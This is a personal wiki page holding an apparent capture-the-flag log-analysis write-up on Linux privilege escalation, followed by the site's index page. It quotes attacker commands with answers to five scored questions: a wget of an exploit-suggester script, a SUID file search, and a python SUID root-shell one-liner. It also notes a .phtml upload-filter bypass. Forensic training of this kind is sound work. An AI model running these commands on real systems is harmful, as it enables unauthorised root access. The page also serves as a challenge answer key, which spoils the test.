<h1 id="log-analysis---privilege-escalation"><a aria-hidden="true" class="anchor-heading icon-link" href="#log-analysis---privilege-escalation"></a>Log Analysis - Privilege Escalation</h1>
Reading Material:
<ul>
<li><a href="https://payatu.com/guide-linux-privilege-escalation">Link 1</a></li>
<li><a href="https://gtfobins.github.io/">Link 2</a></li>
</ul>
<ol>
<li>
What user (other than ‘root’) is present on the server? (2 points)
Relevant command (line 21):
<pre class="language-sh"><code class="language-sh">cd /home/daniel/
</code></pre>
Answer: <code>daniel</code>
</li>
<li>
What script did the attacker try to download to the server? (2 points)
Relevant command (line 32):
<pre class="language-sh"><code class="language-sh">wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
</code></pre>
Answer: <code>linux-exploit-suggester.sh</code>
</li>
<li>
What packet analyzer tool did the attacker try to use? (2 points)
Relevant command (line 47):
<pre class="language-sh"><code class="language-sh">tcpdump
</code></pre>
Answer: <code>tcpdump</code>
</li>
<li>
What file extension did the attacker use to bypass the file upload filter implemented by the developer? (2 points)
Relevant command (line 63):
<pre class="language-sh"><code class="language-sh">rm /var/www/html/uploads/x.phtml
</code></pre>
Answer: <code>.phtml</code>
</li>
<li>
Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load (2 points)
Relevant commands:
<pre class="language-sh"><code class="language-sh">find / -type f -user root -perm -4000 2>/dev/null
./usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
</code></pre>
Answer: <code>4</code>
</li>
</ol>
<hr>
<h2 id="tags"><a aria-hidden="true" class="anchor-heading icon-link" href="#tags"></a>Tags</h2>
<ol>
<li><a title="Private" href="https://wiki.dendron.so/notes/hfyvYGJZQiUwQaaxQO27q.html" target="_blank" class="private">log-analysis (Private)</a></li>
<li><a title="Private" href="https://wiki.dendron.so/notes/hfyvYGJZQiUwQaaxQO27q.html" target="_blank" class="private">privilege-escalation (Private)</a></li>
<li><a title="Private" href="https://wiki.dendron.so/notes/hfyvYGJZQiUwQaaxQO27q.html" target="_blank" class="private">PHP (Private)</a></li>
</ol>

Log Analysis - Privilege Escalation

bits-and-bobbles


# Welcome to bits-and-bobbles

This is the root of my project, an assortment of fragments of code that I have written in the past or used frequently enough that I think they are worth sharing. Please feel free to use them as you see fit, and share and leave a star if you find them useful!

## What's here?

- [[Stack Overflow|stack-overflow]]
- [[Unix & Linux Stack Exchange|unix-stack-exchange]]
- [[Codewars|codewars]]
- [[Codepens|codepen]]
- [[Euler Project|euler]]
- [[Google FooBar|foobar]]
- [[HackTheBox Ops Notes|hackthebox]]
- [[Medium Articles|medium]]
- [[CyberSoc|cybersoc]]
- [[Cyber Institute|cyberinstitute]]
